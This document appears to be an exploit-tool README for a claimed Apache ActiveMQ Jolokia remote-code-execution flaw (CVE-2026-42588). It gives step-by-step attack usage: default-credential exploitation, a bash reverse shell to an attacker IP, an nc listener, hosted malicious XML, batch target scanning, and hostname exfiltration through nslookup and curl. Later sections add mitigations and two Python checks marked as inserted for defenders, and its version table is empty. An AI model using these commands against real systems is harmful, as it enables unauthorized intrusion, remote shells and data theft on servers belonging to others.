Source: https://sploitus.com/exploit?id=E2D2E062-090F-5A3A-84ED-306A6EC90608
# CVE-2026-42588 – Apache ActiveMQ Jolokia Remote Code Execution Vulnerability Exploitation

> **Criticality level**: 🔴 High risk (CVSS 4.0: 8.1)  
> **Vulnerability type**: CWE-94 – Code injection  
> **Affected versions**: Apache ActiveMQ  
> **Exploitation conditions**: Requires Web Console authentication credentials (default: `admin:admin`)  

---

## 📋 Table of Contents

- [Overview of vulnerability](#overview-of-vulnerability)
- [Principle of vulnerability](#principle-of-vulnerability)
- [Affected versions](#affected-versions)
- [Exploitation conditions](#exploitation-conditions)
- [File description](#file-description)
- [Quick start guide](#quick-start-guide)
- [Detailed usage instructions](#detailed-usage-instructions)
- [Exploitation chain diagram](#exploitation-chain-diagram)
- [Verifying successful exploitation](#verifying-successful-exploitation-of-the-vulnerability)
- [Fixing solutions](#fixing-solutions)
- [Temporary mitigation measures](#temporary-mitigation-measures)
- [FAQ](#faq)
- [Disclaimer](#disclaimer)
- [Reference links](#reference-links)

---

## Overview of Vulnerability

**CVE-2026-42588** is a remote code execution vulnerability present in **Apache ActiveMQ**. An attacker can exploit this vulnerability by calling the `BrokerService.addNetworkConnector(String)` method through the **Jolokia JMX-HTTP bridge interface** (`/api/jolokia/`). A carefully crafted `masterslave://` discovery URI is passed as an argument. The `xbean:` protocol is used to load a remote **Spring XML configuration file**, allowing the attacker to execute arbitrary system commands on the ActiveMQ Broker’s JVM.

---

## Principle of Vulnerability

### Exploitation chain

```
/api/jolokia/ (Jolokia JMX-HTTP Bridge)
       │
       ▼
BrokerService.addNetworkConnector(String)
       │
       ▼
masterslave://?brokerConfig=xbean:http://attacker/malicious.xml
       │
       ▼
XBeanBrokerFactory → ResourceXmlApplicationContext
       │
       ▼
Spring pre-instantiates all singleton beans → triggers Runtime.exec() / ProcessBuilder
       │
       ▼
🚨 Remote code execution (RCE)
```

### Key points

| Stage | Description |
|------|------|
| **Jolokia exposure** | The ActiveMQ Web Console exposes `/api/jolokia/` by default, allowing `exec` operations on `org.apache.activemq:*` MBeans |
| **Dangerous method** | `BrokerService.addNetworkConnector(String)` receives and parses the discovery URI |
| **URI triggering chain** | The `brokerConfig` parameter of the `masterslave://` protocol is controllable. Combined with the `xbean:` scheme, it triggers Spring context loading |
| **RCE trigger point** | XBeanBrokerFactory uses `ResourceXmlApplicationContext` to load the remote XML. Spring instantiates all singleton beans before configuration validation |

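Added here as a defender's example, not part of the original tool: a small Python classifier for logged Jolokia requests that flags the indicators of the chain above (an `exec` naming `addNetworkConnector` on an `org.apache.activemq:` MBean, and a discovery URI carrying `brokerConfig=`/`xbean:`). The record shape and MBean names in the samples are constructed assumptions, and the path is URL-decoded as well because Jolokia also accepts requests in GET form, so a POST-only rule would miss them.

```python
import json
import re
from urllib.parse import unquote

# Indicators taken from the exploitation chain above: a Jolokia exec naming
# addNetworkConnector on an ActiveMQ MBean, and a brokerConfig=xbean: discovery URI.
DANGEROUS_OPERATION = "addNetworkConnector"
URI_INDICATORS = re.compile(r"masterslave://|brokerConfig=|xbean:", re.IGNORECASE)

def classify_jolokia_request(method, path, body=""):
    """Reasons a logged Jolokia request matches the chain; [] means nothing suspicious."""
    reasons = []
    if method == "POST" and body:
        try:
            parsed = json.loads(body)
        except ValueError:
            return reasons  # not a Jolokia JSON body; leave it to other rules
        for req in parsed if isinstance(parsed, list) else [parsed]:  # bulk or single
            if not isinstance(req, dict) or req.get("type") != "exec":
                continue
            mbean = str(req.get("mbean", ""))
            operation = str(req.get("operation", ""))
            args = " ".join(str(a) for a in req.get("arguments", []))
            if mbean.startswith("org.apache.activemq:") and DANGEROUS_OPERATION in operation:
                reasons.append("exec of addNetworkConnector on an ActiveMQ MBean")
            if URI_INDICATORS.search(args):
                reasons.append("discovery URI with brokerConfig/xbean indicator")
    # Jolokia also takes the whole request in the URL path (GET style): decode and re-check.
    decoded = unquote(path)
    if "/exec/" in decoded and (DANGEROUS_OPERATION in decoded or URI_INDICATORS.search(decoded)):
        reasons.append("GET-style exec request carrying the same indicators")
    return reasons

# Constructed sample records (method, path, body), not real traffic (assumed log shape).
SAMPLE_REQUESTS = [
    ("POST", "/api/jolokia/", json.dumps({"type": "read",
        "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
        "attribute": "TotalEnqueueCount"})),
    ("POST", "/api/jolokia/", json.dumps({"type": "exec",
        "mbean": "org.apache.activemq:type=Broker,brokerName=localhost,destinationType=Queue,destinationName=TEST",
        "operation": "browse()", "arguments": []})),
    ("POST", "/api/jolokia/", json.dumps({"type": "exec",
        "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
        "operation": "addNetworkConnector(java.lang.String)",
        "arguments": ["masterslave://?brokerConfig=xbean:http://203.0.113.5:8080/malicious.xml"]})),
]

def flagged_indices(records):
    return [i for i, (m, p, b) in enumerate(records) if classify_jolokia_request(m, p, b)]
```

The benign `read` and the queue `browse()` exec produce no reasons; only the third record is flagged, with both indicators.
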
---

## Affected Versions

| Version range | Status |
|--------------|------|
| Apache ActiveMQ | |

---

## Quick Start Guide

### Hosting malicious XML files

Start an HTTP server on the attacker’s machine:

```bash
python3 -m http.server 8080
```

### Exploiting the vulnerability

```bash
# Using default credentials: admin/admin
python CVE-2026-42588_EXP.py \
    -u http://192.168.1.100:8161 \
    -x http://your-attacker-ip:8080/malicious.xml

# Using custom credentials
python CVE-2026-42588_EXP.py \
    -u http://target:8161 \
    -U myuser \
    -P mypass \
    -x http://your-attacker-ip:8080/malicious.xml
```

### (Optional) Checking only for vulnerabilities

```bash
python CVE-2026-42588_EXP.py -u http://192.168.1.100:8161 --check-only
```

---

## Detailed Usage Instructions

### Command-line parameters

```
usage: CVE-2026-42588_EXP.py [-h] [-u URL] [-U USERNAME] [-P PASSWORD]
                             [-x XML_URL] [--check-only] [--gen-xml]
                             [-c COMMAND] [--timeout TIMEOUT] [--no-verify]

Options:
  -u, --url          Target ActiveMQ URL (e.g., http://192.168.1.100:8161)
  -U, --username     Web Console username (default: admin)
  -P, --password     Web Console password (default: admin)
  -x, --xml-url      Remote URL of the malicious Spring XML file
  --check-only       Only check whether the Jolokia interface is accessible
  --gen-xml          Generate and output the malicious XML file to stdout
  -c, --command      Command to execute on the target (default: touch /tmp/activemq_pwned)
  --timeout          Timeout in seconds for HTTP requests (default: 30)
  --no-verify        Disable SSL certificate verification
```

### Scenario 1: Reverse shell

**1. Generate the malicious XML on the attacker’s machine:**

```bash
python CVE-2026-42588_EXP.py --gen-xml \
    -c "/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'" \
    > reverse_shell.xml
```

**2. Host the XML and start the listener:**

```bash
# Terminal 1: HTTP service
python3 -m http.server 8080

# Terminal 2: nc listening
nc -lvnp 4444
```

**3. Trigger the vulnerability:**

```bash
python CVE-2026-42588_EXP.py \
    -u http://target:8161 \
    -x http://10.0.0.1:8080/reverse_shell.xml
```

### Scenario 2: CMD command execution (Windows target)

**1. Generating a malicious XML for Windows:**

Modify the ProcessBuilder command in `malicious.xml` as follows:

```xml
cmd.exe
/c
whoami > C:\windows\temp\pwned.txt
```

**2. Hosting and executing it:**

```bash
python CVE-2026-42588_EXP.py \
    -u http://windows-target:8161 \
    -x http://attacker:8080/malicious_win.xml
```

### Scenario 3: Detection only

```bash
# Batch detection
for ip in $(cat targets.txt); do
    echo "=== Testing $ip ==="
    python CVE-2026-42588_EXP.py -u "http://$ip:8161" --check-only --timeout 5
done
```

---

## Exploitation Chain Diagram

```
┌────────────────────────────────────────────────────────────────────────┐
│                      CVE-2026-42588 attack chain                       │
├────────────────────────────────────────────────────────────────────────┤
│                                                                        │
│  ① Attacker                          ④ ActiveMQ Broker (JVM)           │
│  ┌────────────┐                      ┌──────────────────────────────┐  │
│  │ EXP script │── ② HTTP POST ──────▶│ /api/jolokia/                │  │
│  │            │   Jolokia exec()     │                              │  │
│  │            │   Basic Auth         │ BrokerService.               │  │
│  │            │                      │   addNetworkConnector(       │  │
│  │            │                      │     "masterslave://?         │  │
│  │            │                      │      brokerConfig=           │  │
│  │            │                      │      xbean:http://...        │  │
│  │            │                      │      /malicious.xml"         │  │
│  └────────────┘                      │   )                          │  │
│        │                             └──────────────┬───────────────┘  │
│        │                                            │                  │
│        │       ③ HTTP GET                           ▼                  │
│        │  ┌──────────────────────┐   ┌──────────────────────────────┐  │
│        └─▶│ attacker HTTP server │   │ ResourceXmlApplicationContext│  │
│           │ (python http.server) │   │ loads the remote XML         │  │
│           │                      │   │                              │  │
│           │ malicious.xml        │   │ Spring pre-instantiates bean │  │
│           └──────────────────────┘   │   ──▶ Runtime.exec() /       │  │
│                                      │       ProcessBuilder.start() │  │
│                                      │             │                │  │
│                                      │             ▼                │  │
│                                      │     🚨 RCE successful 🚨     │  │
│                                      └──────────────────────────────┘  │
│                                                                        │
└────────────────────────────────────────────────────────────────────────┘
```

---

## Verifying Successful Exploitation of the Vulnerability

Since command execution occurs during the Spring XML parsing phase, which is **asynchronous**, the execution result may not be directly reflected in the HTTP response. It is recommended to verify using the following methods:

### Method 1: Reverse Shell (Most Reliable)
```bash
# On the attacker machine
nc -lvnp 4444
```

### Method 2: DNS Outbound (OOB)
```bash
# Use nslookup or curl in the command
nslookup $(hostname).your-dns-server.com
```

### Method 3: File Detection
```bash
# Check the log file on the target machine
ls -la /tmp/activemq_pwned
```

### Method 4: HTTP Connection
```bash
# Use it in the malicious XML
curl http://your-server:8888/$(hostname)
# Listen on the attacker machine as well
nc -lvnp 8888
```

---

## Fixing Solutions

### ✅ Recommended Solution: Upgrade the Version
| Version | Upgrade to |
|---------|-------------|
| 5.x Series | **5.19.7** or higher |
| 6.x Series | **6.2.6** or higher |

Download link: [https://activemq.apache.org/download](https://activemq.apache.org/download)

Patch announcement: [https://lists.apache.org/thread/ns0zktfo16s9ql2mmtqtlb6p6xcs45xm](https://lists.apache.org/thread/ns0zktfo16s9ql2mmtqtlb6p6xcs45xm)

---

## Temporary Mitigation Measures

If you cannot upgrade temporarily, you can take the following measures to reduce risks:

### 1. Limit Access to the Jolokia Interface
Limit access to `/api/jolokia/` to local access only, or put it behind a firewall/reverse proxy with an IP whitelist.

### 2. Modify Jolokia Access Policies
Edit `conf/jolokia-access.xml` and disable the `exec` operation for `org.apache.activemq:*` MBeans:

```xml
<restrict>
  <!-- keep the file's existing sections; add this deny entry -->
  <deny>
    <mbean>
      <name>org.apache.activemq:*</name>
      <operation>*</operation>
    </mbean>
  </deny>
</restrict>
```
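An added Python check, not from the tool or from ActiveMQ, that verifies the two controls this page names: that a `jolokia-access.xml` policy blocks `exec` for `org.apache.activemq:*` MBeans (measure 2 above) and that a broker's version is at or above the 5.19.7 / 6.2.6 fixed releases from the Fixing Solutions section. The policy fragments are constructed samples; the elements follow Jolokia's restrictor format (`<restrict>`, `<commands>`, `<deny>`), and an unknown major line is conservatively reported as unfixed.

```python
import re
import xml.etree.ElementTree as ET

# Fixed releases named in the Fixing Solutions section, per major line.
FIXED_VERSIONS = {5: (5, 19, 7), 6: (6, 2, 6)}

def is_fixed_version(version):
    """True when an ActiveMQ version string ('5.19.7', '6.2.6-SNAPSHOT', ...) is at or
    above the fixed release of its major line; any other line is treated as unfixed."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        return False
    parts = tuple(int(x) for x in m.groups())
    fixed = FIXED_VERSIONS.get(parts[0])
    return fixed is not None and parts >= fixed

def jolokia_exec_blocked(policy_xml):
    """Inspect the text of conf/jolokia-access.xml. exec counts as blocked when 'exec'
    is absent from <commands> (no exec allowed at all) or when a <deny> entry covers
    org.apache.activemq:* with operation * or addNetworkConnector."""
    root = ET.fromstring(policy_xml)
    commands = [(c.text or "").strip() for c in root.iter("command")]
    if commands and "exec" not in commands:
        return True
    for deny in root.iter("deny"):
        for mbean in deny.iter("mbean"):
            name = (mbean.findtext("name") or "").strip()
            ops = {(o.text or "").strip() for o in mbean.iter("operation")}
            if name == "org.apache.activemq:*" and ops & {"*", "addNetworkConnector"}:
                return True
    return False

# Constructed policy fragments (not copied from any real installation): the first
# still allows exec on every MBean, the second adds the deny rule from measure 2.
WEAK_POLICY = """<restrict>
  <commands><command>read</command><command>list</command><command>exec</command></commands>
</restrict>"""
HARDENED_POLICY = """<restrict>
  <commands><command>read</command><command>list</command><command>exec</command></commands>
  <deny>
    <mbean><name>org.apache.activemq:*</name><operation>*</operation></mbean>
  </deny>
</restrict>"""

if __name__ == "__main__":
    print("5.19.6 fixed:", is_fixed_version("5.19.6"), "| 6.2.6 fixed:", is_fixed_version("6.2.6"))
    print("weak policy blocks exec:", jolokia_exec_blocked(WEAK_POLICY))
    print("hardened policy blocks exec:", jolokia_exec_blocked(HARDENED_POLICY))
```
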

### 3. Change the Default Credentials
Edit `conf/jetty-realm.properties` and change the default credentials from `admin: admin, admin` to a strong password.

### 4. Disable the Web Console (If Not Needed)
Comment out the Web Console-related configuration in `conf/jetty.xml`.

---

## FAQ

### Q: Is authentication required for this vulnerability?

**A:** Yes, valid credentials for the ActiveMQ Web Console are required. However, the default credentials are `admin/admin`, and many systems do not change their default passwords in actual environments. Therefore, the risk remains high.

### Q: What if there is no output after EXP execution?

**A:** This is normal. Command execution is asynchronous and occurs during Spring XML parsing. It is recommended to use reverse shells, DNS outbound methods, etc. to verify. See [Verifying Successful Exploitation of the Vulnerability](#verifying-successful-exploitation-of-the-vulnerability) for details.

### Q: Does it support Windows targets?

**A:** Yes. You need to change the command in `malicious.xml` from `/bin/sh -c` to `cmd.exe /c`, and adjust the command syntax to Windows style.

### Q: Can the detection mode (`--check-only`) confirm whether the vulnerability exists?

**A:** The detection mode can only confirm whether the Jolokia interface is accessible (a necessary condition for exploiting the vulnerability). Being able to access the interface does not mean it can be exploited, but there is a possibility of exploitation.

### Q: Can the vulnerability still be exploited after patching?

**A:** No. After upgrading to 5.19.7+ or 6.2.6+, the `brokerConfig` parameter parsing logic has been fixed, and the `xbean:` scheme is no longer accepted.

---

## Disclaimer

> ⚠️ **This tool is for security research and authorized testing purposes only!**
>
> - Using this tool for unauthorized system access is **illegal**.
> - Users must bear all consequences and responsibilities arising from using this tool.
> - The author is not responsible for any unauthorized use, abuse, or damages resulting from it.
> - Use this tool on your own system or on a system authorized by written permission.
> - Comply with local laws and professional ethics guidelines.

---

## Reference Links

| Source | Link |
|-------|-------|
| Vulnerability database (CVE Detail) | [https://www.cybersecurity-help.cz/vdb/vulns/133395/](https://www.cybersecurity-help.cz/vdb/vulns/133395/) |
| Antiy vulnerability announcement | [https://bbs.antiy.cn/thread-210844-1-1.html](https://bbs.antiy.cn/thread-210844-1-1.html) |
| DDPOC vulnerability details | [https://ddpoc.com/DVB-2026-11290.html](https://ddpoc.com/DVB-2026-11290.html) |
| Apache ActiveMQ official website | [https://activemq.apache.org/](https://activemq.apache.org/) |
| Apache security announcements | [https://lists.apache.org/thread/ns0zktfo16s9ql2mmtqtlb6p6xcs45xm](https://lists.apache.org/thread/ns0zktfo16s9ql2mmtqtlb6p6xcs45xm) |

---


CVE-2026-42588 – For Educational & Authorized Testing Purposes Only